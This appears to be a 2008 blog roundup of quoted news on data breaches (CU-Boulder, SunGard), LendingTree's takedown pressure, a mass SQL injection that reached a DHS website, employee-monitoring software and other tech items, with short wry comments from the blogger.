Close to home
CU-Boulder Alerting Students And Faculty In Wake Of Compromised Continuing Education Computers
The University of Colorado at Boulder today announced that it discovered three computers in the Division of Continuing Education and Professional Studies were compromised and that one of the computers contains private data (i.e. names, Social Security numbers, addresses, grades) of approximately 9,000 students and approximately 500 instructors.
Although at this time there is no reason to believe that the data on the computer has been accessed, the university will be contacting the affected students and instructors to provide guidance about how to protect their identities.
An analysis of the data compromise is being conducted by a computer forensics firm hired by the university. While this analysis is still in progress, it is believed that this data compromise affects some students who were enrolled in Division of Continuing Education and Professional Studies courses between 1997 and 2003, as well as some instructors employed by the division. The university will mail letters to affected parties by the end of next week.
Source - University of Colorado - Boulder
First words form SunGard?
Sungard still assessing the scope of breach (update)
As of today, Sungard Higher Education was continuing to investigate and analyze the incident involving a laptop stolen from one of their employees. The total number of clients and individuals who had personal information on the laptop is not yet known. Some more new details did emerge today, however.
In contrast to many recents breaches where a laptop was stolen from an employee's vehicle or home, the Sungard laptop was stolen from an employee while the employee was working at a customer site. [That may complicate liability, but the solution is the same. Encryption. Bob] According to a spokesperson, the employee was not following company policies. In a statement provided to PogoWasRight.org, Laura Kvinge, Senior Director of Communication, wrote, "SunGard Higher Education has strict policies for data retention and the handling of sensitive customer information. In this case that policy was not followed."
In order to assist their customers, and in addition to the web site and FAQ they created quickly to respond to the situation, Sungard is offering one year of credit monitoring membership for all affected individuals. In an effort to alleviate the number of calls that the institutions would otherwise have to handle, Sungard has also created a help desk to personally answer calls and assist individuals.
According to Ms. Kvinge, Sungard also offered to assist with the entire notification process, including the production and mailing of notification letters as the institution deems appropriate.
"This incident is a serious matter for SunGard Higher Education. We realize that this challenges the relationship of trust we have built with our customers and we are going to have to work very hard to gain that back."
How to handle the fallout from a security breach? (Remember the “Streisand Effect”)
LendingTree Pressures Blogger To Remove Comments
from the section-230-anyone? dept
You may have heard the story earlier this week about how LendingTree had a security breach as employees were apparently handing out company passwords to mortgage firms, allowing them to access customer data directly. [Not in the articles I read... Bob] LendingTree is now suing the mortgage firms involved. However, LendingTree is apparently trying to crack down on some of the discussion about all of this. On one blog that wrote about the story, a commenter left a comment alleging that LendingTree doesn't actually "let banks compete" but has its own lending center -- which seems to be based on a class action lawsuit that was filed against LendingTree a couple years ago.
However, LendingTree is now putting pressure on bloggers to remove such comments, mentioning that they're defamatory. Of course, thanks to section 230 of the CDA, a blogger is not responsible for defamatory content left by others (they are still responsible for their own defamatory content, of course). While it doesn't appear that LendingTree's legal notes have entirely reached the level of a cease & desist (more like a legalistic nudge), it does sound like they've convinced some other bloggers to remove content that need not be removed. And, of course, by claiming that the content is defamatory, it may scare some bloggers who don't understand their section 230 safe harbors to feel obligated to remove the content.
A mere amateur. The pros were intercepting the wireless signals from another building...
If Top Gov't Officials Need To Leave Blackberries Outside A Meeting, Shouldn't Someone Guard Them?
from the just-a-thought dept
Apparently a Mexican press attache at a meeting with White House officials in New Orleans saw an opportunity and swiped the Blackberries of a bunch of White House staffers. At many such meetings, it's required for attendees to leave their phones and mobile devices outside of the meeting room. You would think that with such high-powered government officials that someone would then be left to guard the devices, but apparently not. This guy grabbed a bunch of the devices and made a run for the airport, where he was caught by Secret Service officials, who promptly showed him the surveillance camera footage of him taking the devices. His response was that he thought the devices had been left behind, and he was merely picking them up to return them to their owners, which might be more believable if the folks weren't still in the meeting room when he grabbed all the devices. Who knows if it's true, but I'm still wondering why no one was guarding the Blackberries.
CyberWar For my Security students
Page last updated at 13:48 GMT, Friday, 25 April 2008 14:48 UK
Hackers warn high street chains
High street chains will be the next victims of cyber terrorism, some of the world's elite hackers have warned.
... "If someone wants to have a pop at the UK, they are unlikely to go for the government web servers. They will go for the lower hanging fruit - companies which are seen as good representatives of the country.
Moving into the 21st Century... Blogging done right!
Beer, Blogs And Bias
from the i'll-drink-to-that dept
The Wall Street Journal has an article focusing on a blog set up by Miller Brewing Company called Brew Blog. There are a few different, interesting points worth discussing here. First, the blog isn't used as a blog about what's going on at Miller Brewing. Instead, Miller hired an experienced reporter, and told him to just cover the beer industry as if he were a beat reporter. In other words, it's reporting news -- and even breaking stories on the competition. In fact, it revealed that main rival Anheuser-Busch was planning a new beer before A-B was able to make the announcement itself. This is certainly a recognition of how content is advertising. The blog clearly isn't "advertorial." It's full-on reporting about the industry, in a way that's interesting and relevant to those in the industry.
What may be even more interesting, though, is what the article says about journalism. In an age in which journalists are whining that their jobs are disappearing, here's yet another example of where suddenly there are new types of jobs for journalists appearing every day. But, even more interesting, is a quote at the end of the article highlighted by David Card. It's from Harry Schuhmacher, the editor and publisher of a fee-based trade publication on the beer industry:
"I tell Miller you're subsidizing a free publication, and it hurts the trade press," he says. "But they don't care."...Mr. Schuhmacher adds that he writes fewer positive pieces about Miller than he once did because he knows Brew Blog will always publish the same stories.
Think about this for a bit. People complain that when you have a company-sponsored publication it will inevitably be biased -- but the sponsorship of that site is totally open and in the clear. The site's content stands for itself. Yet, at the same time, a supposedly "objective" traditional journalist is admitting that he writes fewer stories about Miller because he's upset that it's competing with his own publication. From that, it would certainly seem like the Brew Blog is a lot more credible (it's biases are out in the open), while this fee-based trade pub admits that story choices are sometimes based on personal vendettas.
If I recall correctly, this is called “undue reliance” The computer is NOT always right, nor are procedures always adequate. (Besides, an “irate” judge often writes amusing opinions...)
Judge Slams Florida Authorities For Bogus Toll Fines
from the it's-all-about-the-money dept
It's not just with red light cameras that local authorities are squeezing extra money out of drivers, Consumerist points us to the news that a judge in Florida has tossed out thousands of bogus toll citations, slamming both the Orlando-Orange County Expressway Authority and Florida Turnpike Authority for failing to deal with the fines properly. It appears that some of the fines resulted from malfunctioning toll transponders. The judge noted that this should have been easy for the traffic authorities to correct, but instead they made it a bureaucratic nightmare for those unfairly and incorrectly accused of running tolls. The judge has even gone so far as to bar the two Authorities from issuing any new citations to drivers who have prepaid or credit-card accounts -- to the point that he's instructed the court clerks in both places to refuse to accept any new citations without affidavits swearing that the offenders have no money in their accounts.
[From the article:
"In this technology age, it is hard to believe it would take more than a few computer keystrokes to rectify the problem of matching alleged violators to account holder's vehicles," Galluzzo wrote.
Perhaps they could wire the attorney's chairs in order to deliver instant (1000 volt) sanctions?
April 25, 2008
Long Range Plan for Information Technology in the Federal Judiciary
"The fiscal year 2008 update to the Long Range Plan for Information Technology in the Federal Judiciary articulates five-year directions and objectives for the judiciary’s information technology program. The plan presents the program in terms of five fundamental areas: external participants, court operations, judges and chambers, probation and pretrial services, and information technology infrastructure. This represents a more aggressive effort to identify needs by various constituents. Future updates to the plan will build on this approach and incorporate additional elements."
What do you need to know and how will you find out?
UK: Office snooping software attacked by privacy groups
Companies are coming under fire from privacy campaigners for rolling out a computer program which enables them to track the communications and contacts of their staff.
... One of the more sophisticated programs, provided by a software company called Contact Networks, analyses the frequency of an employee's communications with their contacts, to distinguish, for instance, between someone contacted briefly in relation to one deal, say, and someone with whom a more long-standing relationship exists.
Source - Times Online
[From the article:
The software can be put to a range of uses, from a simple trawling of the entire company's Microsoft Outlook database to see if any employee knows someone at 'company X', through to a more intrusive approach, including monitoring the content of e-mails on a regular basis.
Perhaps we shouldn't follow their lead...
Department of Homeland Security website hacked!
By Dan Goodin Published Friday 25th April 2008 18:57 GMT
The sophisticated mass infection that's injecting attack code into hundreds of thousands of reputable web pages is growing and even infiltrated the website of the Department of Homeland Security.
While so-called SQL injections are nothing new, this latest attack, which we we reported earlier, is notable for its ability to infect huge numbers of pages using only a single string of text. At time of writing, Google searches here, here and here showed almost 520,000 pages containing the infection string, though the exact number changes almost constantly. As the screenshot below shows, even the DHS, which is responsible for protecting US infrastructure against cyber attacks, wasn't immune.
... The script is also notable for its ability to slip past web application defenses. The SQL query is mostly made up of HEX code, allowing it to obscure itself, at least to apps that use Microsoft SQL. MySQL and PostgreSQL are less easily fooled, according to researcher Ronald van den Heetkamp.
Sites are getting pwned because they fail to sanitize user supplied data.
Got video? For my web site class
StartYourTube.com - Create the Next Big Thing Online
Just as the name implies, Start Your Tube is a site that encourages users to start their own version of YouTube in hopes that it explodes. Start Your Tube allows users to create their own video sharing site within minutes for free, then invite friends to view the uploaded content. Users may customize their own Tube site with colors, text, and graphics, in addition to posted material. Tube creators can easily spread the word about their created site through the “Share” function. Other Tubes can be searched and viewed for inspiration and entertainment. Furthermore, users have the ability to make money from advertising on their Tubes.
I bet they meant to do that – or perhaps none of them have minds like Bevis & Butthead?
OGC unveils new logo to red faces
By Aislinn Simpson Last Updated: 3:58pm BST 25/04/2008